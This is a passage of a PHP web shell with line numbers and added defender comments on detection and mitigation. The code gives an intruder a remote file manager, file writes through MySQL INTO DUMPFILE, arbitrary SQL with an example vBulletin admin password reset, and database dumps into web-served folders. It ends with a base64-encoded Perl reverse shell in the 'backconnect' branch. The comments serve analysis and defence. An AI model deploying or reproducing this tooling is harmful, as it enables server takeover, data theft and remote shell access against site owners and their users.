 587         $dirdata = GetList($nowpath);
 588     } else {
 589         // Open dir
 590         $dirs = @opendir($dir);
 591         while ($file = @readdir($dirs)) {
 592             $filepath = $nowpath . $file;
 593             if (@is_dir($filepath)) {
 594                 $dirdb['filename'] = $file;
 595                 $dirdb['mtime'] = @date('Y-m-d H:i:s', filemtime($filepath));
 596                 $dirdb['dirchmod'] = getChmod($filepath);
 597                 $dirdb['dirperm'] = getPerms($filepath);
 598                 $dirdb['fileowner'] = getUser($filepath);
 599                 $dirdb['dirlink'] = $nowpath;
 600                 $dirdb['server_link'] = $filepath;
 601                 $dirdb['client_link'] = ue($filepath);
 602                 $dirdata[] = $dirdb;
 603             } else {
 604                 $filedb['filename'] = $file;
 605                 $filedb['size'] = sizecount(@filesize($filepath));
 606                 $filedb['mtime'] = @date('Y-m-d H:i:s', filemtime($filepath));
 607                 $filedb['filechmod'] = getChmod($filepath);
 608                 $filedb['fileperm'] = getPerms($filepath);
 609                 $filedb['fileowner'] = getUser($filepath);
 610                 $filedb['dirlink'] = $nowpath;
 611                 $filedb['server_link'] = $filepath;
 612                 $filedb['client_link'] = ue($filepath);
 613                 $filedata[] = $filedb;
 614             }
 615         } // while
 616         unset($dirdb);
 617         unset($filedb);
 618         @closedir($dirs);
 619     }
 620     @sort($dirdata);
 621     @sort($filedata);
 622     $dir_i = '0';
 623     foreach ($dirdata as $key => $dirdb) {
 624         if ($dirdb['filename'] != '..' && $dirdb['filename'] != '.') {
 625             $thisbg = bg();
 626             p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
 627             p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
 628             p('<td><a href="javascript:godir(\'' . $dirdb['server_link'] . '\');">' . $dirdb['filename'] . '</a></td>');
 629             p('<td nowrap>' . $dirdb['mtime'] . '</td>');
 630             p('<td nowrap>--</td>');
 631             p('<td nowrap>');
 632             p('<a href="javascript:fileperm(\'' . $dirdb['server_link'] . '\');">' . $dirdb['dirchmod'] . '</a> / ');
 633             p('<a href="javascript:fileperm(\'' . $dirdb['server_link'] . '\');">' . $dirdb['dirperm'] . '</a>' . $dirdb['fileowner'] . '</td>');
 634             p('<td nowrap><a href="javascript:dofile(\'deldir\',\'' . $dirdb['server_link'] . '\',\'Are you sure will delete ' . $dirdb['filename'] . '? \\n\\nIf non-empty directory, will be delete all the files.\')">Del</a> | <a href="javascript:rename(\'' . $dirdb['server_link'] . '\');">Rename</a></td>');
 635             p('</tr>');
 636             $dir_i++;
 637         } else {
 638             if ($dirdb['filename'] == '..') {
 639                 p('<tr class=fout>');
 640                 p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\'' . getUpPath($nowpath) . '\');">Parent Directory</a></td>');
 641                 p('</tr>');
 642             }
 643         }
 644     }
 645     p('<tr bgcolor="green" stlye="border-top:1px solid gray;border-bottom:1px solid gray;"><td colspan="6" height="5"></td></tr>');
 646     p('<form id="filelist" name="filelist" action="' . $self . '" method="post">');
 647     makehide('action', 'file');
 648     makehide('thefile');
 649     makehide('doing');
 650     makehide('dir', $nowpath);
 651     $file_i = '0';
 652     foreach ($filedata as $key => $filedb) {
 653         if ($filedb['filename'] != '..' && $filedb['filename'] != '.') {
 654             $fileurl = str_replace(SA_ROOT, '', $filedb['server_link']);
 655             $thisbg = bg();
 656             p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
 657             p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl[' . $filedb['server_link'] . ']"></td>');
 658             p('<td><a href="' . $fileurl . '" target="_blank">' . $filedb['filename'] . '</a></td>');
 659             p('<td nowrap>' . $filedb['mtime'] . '</td>');
 660             p('<td nowrap>' . $filedb['size'] . '</td>');
 661             p('<td nowrap>');
 662             p('<a href="javascript:fileperm(\'' . $filedb['server_link'] . '\');">' . $filedb['filechmod'] . '</a> / ');
 663             p('<a href="javascript:fileperm(\'' . $filedb['server_link'] . '\');">' . $filedb['fileperm'] . '</a>' . $filedb['fileowner'] . '</td>');
 664             p('<td nowrap>');
 665             p('<a href="javascript:dofile(\'downfile\',\'' . $filedb['server_link'] . '\');">Down</a> | ');
 666             p('<a href="javascript:copyfile(\'' . $filedb['server_link'] . '\');">Copy</a> | ');
 667             p('<a href="javascript:opfile(\'editfile\',\'' . $filedb['server_link'] . '\',\'' . $filedb['dirlink'] . '\');">Edit</a> | ');
 668             p('<a href="javascript:rename(\'' . $filedb['server_link'] . '\');">Rename</a> | ');
 669             p('<a href="javascript:opfile(\'newtime\',\'' . $filedb['server_link'] . '\',\'' . $filedb['dirlink'] . '\');">Time</a>');
 670             p('</td></tr>');
 671             $file_i++;
 672         }
 673     }
 674     p('<tr class="fout1"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">Packing download selected</a> - <a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td colspan="4" align="right">' . $dir_i . ' directories / ' . $file_i . ' files</td></tr>');
 675     p('</form></table>');
 676 } // end dir
 677 elseif ($action == 'sqlfile') {
 678     if ($doing == "mysqlupload") {
             // Defender note: this path writes a file through the database server, not through PHP.
             // The uploaded bytes are read from PHP's temp file, hex-encoded, and embedded as a 0x
             // literal in a SELECT ... INTO DUMPFILE statement, so the MySQL server process creates
             // the file at $savepath. $savepath is a request variable (form field "savepath", printed
             // further down in this branch); the form text there states the DB user needs FILE privilege.
             // dbconn(), q() and m() are helpers defined outside this excerpt.
 679         $file = $_FILES['uploadfile'];
 680         $filename = $file['tmp_name'];
 681         if (file_exists($savepath)) {
 682             m('The goal file has already existed');
 683         } else {
 684             if (!$filename) {
 685                 m('Please choose a file');
 686             } else {
 687                 $fp = @fopen($filename, 'r');
 688                 $contents = @fread($fp, filesize($filename));
 689                 @fclose($fp);
 690                 $contents = bin2hex($contents);
                     // $upname is assigned here but not used again in the lines shown.
 691                 if (!$upname) $upname = $file['name'];
 692                 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
                     // Detection: an INTO DUMPFILE statement carrying a long hex literal and selecting
                     // FROM mysql.user in the MySQL general/audit log is a strong indicator of this tool.
                     // Mitigation: do not grant FILE to application accounts, and restrict server-side
                     // file writes with the secure_file_priv system variable.
 693                 $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
 694                 m($result ? 'Upload success' : 'Upload has failed: ' . mysql_error());
 695             }
 696         }
 697     }
 698 ?>
 699 <script type="text/javascript">
 700 function mysqlfile(doing){
 701    if(!doing) return;
 702    $('doing').value=doing;
 703    $('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
 704    $('mysqlfile').dbport.value=$('dbinfo').dbport.value;
 705    $('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
 706    $('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
 707    $('mysqlfile').dbname.value=$('dbinfo').dbname.value;
 708    $('mysqlfile').charset.value=$('dbinfo').charset.value;
 709    $('mysqlfile').submit();
 710 }
 711 </script>
 712 <?php
 713     !$dbhost && $dbhost = 'localhost';
 714     !$dbuser && $dbuser = 'root';
 715     !$dbport && $dbport = '3306';
 716     $charsets = array('' => 'Default', 'gbk' => 'GBK', 'big5' => 'Big5', 'utf8' => 'UTF-8', 'latin1' => 'Latin1');
 717     formhead(array('title' => 'MYSQL Information', 'name' => 'dbinfo'));
 718     makehide('action', 'sqlfile');
 719     p('<p>');
 720     p('DBHost:');
 721     makeinput(array('name' => 'dbhost', 'size' => 20, 'value' => $dbhost));
 722     p(':');
 723     makeinput(array('name' => 'dbport', 'size' => 4, 'value' => $dbport));
 724     p('DBUser:');
 725     makeinput(array('name' => 'dbuser', 'size' => 15, 'value' => $dbuser));
 726     p('DBPass:');
 727     makeinput(array('name' => 'dbpass', 'size' => 15, 'value' => $dbpass));
 728     p('DBName:');
 729     makeinput(array('name' => 'dbname', 'size' => 15, 'value' => $dbname));
 730     p('DBCharset:');
 731     makeselect(array('name' => 'charset', 'option' => $charsets, 'selected' => $charset));
 732     p('</p>');
 733     formfoot();
 734     p('<form action="' . $self . '" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
 735     p('<h2>Upload file</h2>');
 736     p('<p><b>This operation the DB user must has FILE privilege</b></p>');
 737     p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
 738     p('<h2>Download file</h2>');
 739     p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
 740     makehide('dbhost');
 741     makehide('dbport');
 742     makehide('dbuser');
 743     makehide('dbpass');
 744     makehide('dbname');
 745     makehide('charset');
 746     makehide('doing');
 747     makehide('action', 'sqlfile');
 748     p('</form>');
 749 } elseif ($action == 'sqladmin') {
 750     !$dbhost && $dbhost = 'localhost';
 751     !$dbuser && $dbuser = 'root';
 752     !$dbport && $dbport = '3306';
 753     $dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
 754     if (isset($dbhost)) {
 755         $dbform.= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
 756     }
 757     if (isset($dbuser)) {
 758         $dbform.= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
 759     }
 760     if (isset($dbpass)) {
 761         $dbform.= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
 762     }
 763     if (isset($dbport)) {
 764         $dbform.= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
 765     }
 766     if (isset($dbname)) {
 767         $dbform.= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
 768     }
 769     if (isset($charset)) {
 770         $dbform.= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
 771     }
 772     if ($doing == 'backupmysql' && $saveasfile) {
             // Defender note: dumps the tables ticked in the table list to a file on the web host.
             // $table and $path are request variables. The export form printed later in this branch
             // pre-fills "path" with SA_ROOT . $_SERVER['HTTP_HOST'] . "_MySQL.sql", i.e. a file in
             // the script's own directory, and the success message links to it for download.
             // Detection: unexpected "<hostname>_MySQL.sql" (or other .sql) files in web-served
             // directories, followed by a GET for that file. After finding this shell, treat every
             // database credential readable by the web account as exposed and rotate it.
 773         if (!$table) {
 774             m('Please choose the table');
 775         } else {
 776             dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
 777             $table = array_flip($table);
                 // Opened for writing with errors suppressed; an existing file at $path is truncated.
 778             $fp = @fopen($path, 'w');
 779             if ($fp) {
 780                 $result = q('SHOW tables');
 781                 if (!$result) p('<h2>' . mysql_error() . '</h2>');
 782                 $mysqldata = '';
 783                 while ($currow = mysql_fetch_array($result)) {
 784                     if (isset($table[$currow[0]])) {
                             // sqldumptable() is defined outside this excerpt; presumably it writes
                             // the table's schema and rows to $fp. Confirm against the full file.
 785                         sqldumptable($currow[0], $fp);
 786                     }
 787                 }
 788                 fclose($fp);
 789                 $fileurl = str_replace(SA_ROOT, '', $path);
 790                 m('Database has success backup to <a href="' . $fileurl . '" target="_blank">' . $path . '</a>');
 791                 mysql_close();
 792             } else {
 793                 m('Backup failed');
 794             }
 795         }
 796     }
 797     if ($insert && $insertsql) {
 798         $keystr = $valstr = $tmp = '';
 799         foreach ($insertsql as $key => $val) {
 800             if ($val) {
 801                 $keystr.= $tmp . $key;
 802                 $valstr.= $tmp . "'" . addslashes($val) . "'";
 803                 $tmp = ',';
 804             }
 805         }
 806         if ($keystr && $valstr) {
 807             dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
 808             m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
 809         }
 810     }
 811     if ($update && $insertsql && $base64) {
 812         $valstr = $tmp = '';
 813         foreach ($insertsql as $key => $val) {
 814             $valstr.= $tmp . $key . "='" . addslashes($val) . "'";
 815             $tmp = ',';
 816         }
 817         if ($valstr) {
 818             $where = base64_decode($base64);
 819             dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
 820             m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
 821         }
 822     }
 823     if ($doing == 'del' && $base64) {
 824         $where = base64_decode($base64);
 825         $delete_sql = "DELETE FROM $tablename WHERE $where";
 826         dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
 827         m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
 828     }
 829     if ($tablename && $doing == 'drop') {
 830         dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
 831         if (q("DROP TABLE $tablename")) {
 832             m('Drop table of success');
 833             $tablename = '';
 834         } else {
 835             m(mysql_error());
 836         }
 837     }
 838     $charsets = array('' => 'Default', 'gbk' => 'GBK', 'big5' => 'Big5', 'utf8' => 'UTF-8', 'latin1' => 'Latin1');
 839     formhead(array('title' => 'MYSQL Manager'));
 840     makehide('action', 'sqladmin');
 841     p('<p>');
 842     p('DBHost:');
 843     makeinput(array('name' => 'dbhost', 'size' => 20, 'value' => $dbhost));
 844     p(':');
 845     makeinput(array('name' => 'dbport', 'size' => 4, 'value' => $dbport));
 846     p('DBUser:');
 847     makeinput(array('name' => 'dbuser', 'size' => 15, 'value' => $dbuser));
 848     p('DBPass:');
 849     makeinput(array('name' => 'dbpass', 'size' => 15, 'value' => $dbpass));
 850     p('DBCharset:');
 851     makeselect(array('name' => 'charset', 'option' => $charsets, 'selected' => $charset));
 852     makeinput(array('name' => 'connect', 'value' => 'Connect', 'type' => 'submit', 'class' => 'bt'));
 853     p('</p>');
 854     formfoot();
 855 ?>
 856 <script type="text/javascript">
 857 function editrecord(action, base64, tablename){
 858   if (action == 'del') {
 859       if (!confirm('Is or isn\'t deletion record?')) return;
 860   }
 861   $('recordlist').doing.value=action;
 862   $('recordlist').base64.value=base64;
 863   $('recordlist').tablename.value=tablename;
 864   $('recordlist').submit();
 865 }
 866 function moddbname(dbname) {
 867   if(!dbname) return;
 868   $('setdbname').dbname.value=dbname;
 869   $('setdbname').submit();
 870 }
 871 function settable(tablename,doing,page) {
 872   if(!tablename) return;
 873   if (doing) {
 874       $('settable').doing.value=doing;
 875   }
 876   if (page) {
 877       $('settable').page.value=page;
 878   }
 879   $('settable').tablename.value=tablename;
 880   $('settable').submit();
 881 }
 882 </script>
 883 <?php
 884     // SQL
 885     formhead(array('name' => 'recordlist'));
 886     makehide('doing');
 887     makehide('action', 'sqladmin');
 888     makehide('base64');
 889     makehide('tablename');
 890     p($dbform);
 891     formfoot();
 892     // Data
 893     formhead(array('name' => 'setdbname'));
 894     makehide('action', 'sqladmin');
 895     p($dbform);
 896     if (!$dbname) {
 897         makehide('dbname');
 898     }
 899     formfoot();
 900     formhead(array('name' => 'settable'));
 901     makehide('action', 'sqladmin');
 902     p($dbform);
 903     makehide('tablename');
 904     makehide('page', $page);
 905     makehide('doing');
 906     formfoot();
 907     $cachetables = array();
 908     $pagenum = 30;
 909     $page = intval($page);
 910     if ($page) {
 911         $start_limit = ($page - 1) * $pagenum;
 912     } else {
 913         $start_limit = 0;
 914         $page = 1;
 915     }
 916     if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
 917         dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
 918         // get mysql server
 919         $mysqlver = mysql_get_server_info();
 920         p('<p>MySQL ' . $mysqlver . ' running in ' . $dbhost . ' as ' . $dbuser . '@' . $dbhost . '</p>');
 921         $highver = $mysqlver > '4.1' ? 1 : 0;
 922         // Show database
 923         $query = q("SHOW DATABASES");
 924         $dbs = array();
 925         $dbs[] = '-- Select a database --';
 926         while ($db = mysql_fetch_array($query)) {
 927             $dbs[$db['Database']] = $db['Database'];
 928         }
 929         makeselect(array('title' => 'Please select a database:', 'name' => 'db[]', 'option' => $dbs, 'selected' => $dbname, 'onchange' => 'moddbname(this.options[this.selectedIndex].value)', 'newline' => 1));
 930         $tabledb = array();
 931         if ($dbname) {
 932             p('<p>');
 933             p('Current dababase: <a href="javascript:moddbname(\'' . $dbname . '\');">' . $dbname . '</a>');
 934             if ($tablename) {
 935                 p(' | Current Table: <a href="javascript:settable(\'' . $tablename . '\');">' . $tablename . '</a> [ <a href="javascript:settable(\'' . $tablename . '\', \'insert\');">Insert</a> | <a href="javascript:settable(\'' . $tablename . '\', \'structure\');">Structure</a> | <a href="javascript:settable(\'' . $tablename . '\', \'drop\');">Drop</a> ]');
 936             }
 937             p('</p>');
 938             mysql_select_db($dbname);
 939             $getnumsql = '';
 940             $runquery = 0;
 941             if ($sql_query) {
 942                 $runquery = 1;
 943             }
 944             $allowedit = 0;
 945             if ($tablename && !$sql_query) {
 946                 $sql_query = "SELECT * FROM $tablename";
 947                 $getnumsql = $sql_query;
 948                 $sql_query = $sql_query . " LIMIT $start_limit, $pagenum";
 949                 $allowedit = 1;
 950             }
 951             p('<form action="' . $self . '" method="POST">');
 952             p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database <font color=red><b>' . $dbname . '</font></b>:<BR>Example VBB Password: <font color=red>vbateam</font><BR><font color=yellow>UPDATE `user` SET `password` = \'69e53e5ab9536e55d31ff533aefc4fbe\', salt = \'p5T\' WHERE `userid` = \'1\' </font>
 953           </td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">' . htmlspecialchars($sql_query, ENT_QUOTES) . '</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
 954             makehide('tablename', $tablename);
 955             makehide('action', 'sqladmin');
 956             p($dbform);
 957             p('</form>');
 958             if ($tablename || ($runquery && $sql_query)) {
 959                 if ($doing == 'structure') {
 960                     $result = q("SHOW COLUMNS FROM $tablename");
 961                     $rowdb = array();
 962                     while ($row = mysql_fetch_array($result)) {
 963                         $rowdb[] = $row;
 964                     }
 965                     p('<table border="0" cellpadding="3" cellspacing="0">');
 966                     p('<tr class="head">');
 967                     p('<td>Field</td>');
 968                     p('<td>Type</td>');
 969                     p('<td>Null</td>');
 970                     p('<td>Key</td>');
 971                     p('<td>Default</td>');
 972                     p('<td>Extra</td>');
 973                     p('</tr>');
 974                     foreach ($rowdb as $row) {
 975                         $thisbg = bg();
 976                         p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
 977                         p('<td>' . $row['Field'] . '</td>');
 978                         p('<td>' . $row['Type'] . '</td>');
 979                         p('<td>' . $row['Null'] . '&nbsp;</td>');
 980                         p('<td>' . $row['Key'] . '&nbsp;</td>');
 981                         p('<td>' . $row['Default'] . '&nbsp;</td>');
 982                         p('<td>' . $row['Extra'] . '&nbsp;</td>');
 983                         p('</tr>');
 984                     }
 985                     tbfoot();
 986                 } elseif ($doing == 'insert' || $doing == 'edit') {
 987                     $result = q('SHOW COLUMNS FROM ' . $tablename);
 988                     while ($row = mysql_fetch_array($result)) {
 989                         $rowdb[] = $row;
 990                     }
 991                     $rs = array();
 992                     if ($doing == 'insert') {
 993                         p('<h2>Insert new line in ' . $tablename . ' table &raquo;</h2>');
 994                     } else {
 995                         p('<h2>Update record in ' . $tablename . ' table &raquo;</h2>');
 996                         $where = base64_decode($base64);
 997                         $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
 998                         $rs = mysql_fetch_array($result);
 999                     }
1000                     p('<form method="post" action="' . $self . '">');
1001                     p($dbform);
1002                     makehide('action', 'sqladmin');
1003                     makehide('tablename', $tablename);
1004                     p('<table border="0" cellpadding="3" cellspacing="0">');
1005                     foreach ($rowdb as $row) {
1006                         if ($rs[$row['Field']]) {
1007                             $value = htmlspecialchars($rs[$row['Field']]);
1008                         } else {
1009                             $value = '';
1010                         }
1011                         $thisbg = bg();
1012                         p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1013                         p('<td><b>' . $row['Field'] . '</b><br />' . $row['Type'] . '</td><td><textarea class="area" name="insertsql[' . $row['Field'] . ']" style="width:500px;height:60px;overflow:auto;">' . $value . '</textarea></td></tr>');
1014                     }
1015                     if ($doing == 'insert') {
1016                         p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
1017                     } else {
1018                         p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
1019                         makehide('base64', $base64);
1020                     }
1021                     p('</table></form>');
1022                 } else {
1023                     $querys = @explode(';', $sql_query);
1024                     foreach ($querys as $num => $query) {
1025                         if ($query) {
1026                             p("<p><b>Query#{$num} : " . htmlspecialchars($query, ENT_QUOTES) . "</b></p>");
1027                             switch (qy($query)) {
1028                                 case 0:
1029                                     p('<h2>Error : ' . mysql_error() . '</h2>');
1030                                 break;
1031                                 case 1:
1032                                     if (strtolower(substr($query, 0, 13)) == 'select * from') {
1033                                         $allowedit = 1;
1034                                     }
1035                                     if ($getnumsql) {
1036                                         $tatol = mysql_num_rows(q($getnumsql));
1037                                         $multipage = multi($tatol, $pagenum, $page, $tablename);
1038                                     }
1039                                     if (!$tablename) {
1040                                         $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
1041                                         $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
1042                                         preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i", $sql_line, $matches);
1043                                         $tablename = $matches[1][0];
1044                                     }
1045                                     $result = q($query);
1046                                     p($multipage);
1047                                     p('<table border="0" cellpadding="3" cellspacing="0">');
1048                                     p('<tr class="head">');
1049                                     if ($allowedit) p('<td>Action</td>');
1050                                     $fieldnum = @mysql_num_fields($result);
1051                                     for ($i = 0;$i < $fieldnum;$i++) {
1052                                         $name = @mysql_field_name($result, $i);
1053                                         $type = @mysql_field_type($result, $i);
1054                                         $len = @mysql_field_len($result, $i);
1055                                         p("<td nowrap>$name<br><span>$type($len)</span></td>");
1056                                     }
1057                                     p('</tr>');
1058                                     while ($mn = @mysql_fetch_assoc($result)) {
1059                                         $thisbg = bg();
1060                                         p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1061                                         $where = $tmp = $b1 = '';
1062                                         foreach ($mn as $key => $inside) {
1063                                             if ($inside) {
1064                                                 $where.= $tmp . $key . "='" . addslashes($inside) . "'";
1065                                                 $tmp = ' AND ';
1066                                             }
1067                                             $b1.= '<td nowrap>' . html_clean($inside) . '&nbsp;</td>';
1068                                         }
1069                                         $where = base64_encode($where);
1070                                         if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \'' . $where . '\', \'' . $tablename . '\');">Edit</a> | <a href="javascript:editrecord(\'del\', \'' . $where . '\', \'' . $tablename . '\');">Del</a></td>');
1071                                         p($b1);
1072                                         p('</tr>');
1073                                         unset($b1);
1074                                     }
1075                                     tbfoot();
1076                                     p($multipage);
1077                                     break;
1078                                 case 2:
1079                                     $ar = mysql_affected_rows();
1080                                     p('<h2>affected rows : <b>' . $ar . '</b></h2>');
1081                                     break;
1082                                 }
1083                             }
1084                     }
1085                 }
1086             } else {
1087                 $query = q("SHOW TABLE STATUS");
1088                 $table_num = $table_rows = $data_size = 0;
1089                 $tabledb = array();
1090                 while ($table = mysql_fetch_array($query)) {
1091                     $data_size = $data_size + $table['Data_length'];
1092                     $table_rows = $table_rows + $table['Rows'];
1093                     $table['Data_length'] = sizecount($table['Data_length']);
1094                     $table_num++;
1095                     $tabledb[] = $table;
1096                 }
1097                 $data_size = sizecount($data_size);
1098                 unset($table);
1099                 p('<table border="0" cellpadding="0" cellspacing="0">');
1100                 p('<form action="' . $self . '" method="POST">');
1101                 makehide('action', 'sqladmin');
1102                 p($dbform);
1103                 p('<tr class="head">');
1104                 p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
1105                 p('<td>Name</td>');
1106                 p('<td>Rows</td>');
1107                 p('<td>Data_length</td>');
1108                 p('<td>Create_time</td>');
1109                 p('<td>Update_time</td>');
1110                 if ($highver) {
1111                     p('<td>Engine</td>');
1112                     p('<td>Collation</td>');
1113                 }
1114                 p('</tr>');
1115                 foreach ($tabledb as $key => $table) {
1116                     $thisbg = bg();
1117                     p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1118                     p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="' . $table['Name'] . '" /></td>');
1119                     p('<td><a href="javascript:settable(\'' . $table['Name'] . '\');">' . $table['Name'] . '</a> [ <a href="javascript:settable(\'' . $table['Name'] . '\', \'insert\');">Insert</a> | <a href="javascript:settable(\'' . $table['Name'] . '\', \'structure\');">Structure</a> | <a href="javascript:settable(\'' . $table['Name'] . '\', \'drop\');">Drop</a> ]</td>');
1120                     p('<td>' . $table['Rows'] . '</td>');
1121                     p('<td>' . $table['Data_length'] . '</td>');
1122                     p('<td>' . $table['Create_time'] . '</td>');
1123                     p('<td>' . $table['Update_time'] . '</td>');
1124                     if ($highver) {
1125                         p('<td>' . $table['Engine'] . '</td>');
1126                         p('<td>' . $table['Collation'] . '</td>');
1127                     }
1128                     p('</tr>');
1129                 }
1130                 p('<tr class=fout>');
1131                 p('<td>&nbsp;</td>');
1132                 p('<td>Total tables: ' . $table_num . '</td>');
1133                 p('<td>' . $table_rows . '</td>');
1134                 p('<td>' . $data_size . '</td>');
1135                 p('<td colspan="' . ($highver ? 4 : 2) . '">&nbsp;</td>');
1136                 p('</tr>');
1137                 p("<tr class=\"fout\"><td colspan=\"" . ($highver ? 8 : 6) . "\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"" . SA_ROOT . $_SERVER['HTTP_HOST'] . "_MySQL.sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");
1138                 makehide('doing', 'backupmysql');
1139                 formfoot();
1140                 p("</table>");
1141                 fr($query);
1142             }
1143         }
1144     }
1145     tbfoot();
1146     @mysql_close();
1147 } //end sql backup
1148 elseif ($action == 'backconnect') {
1149     !$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
1150     !$yourport && $yourport = '12345';
1151     $usedb = array('perl' => 'perl', 'c' => 'c');
1152     $back_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
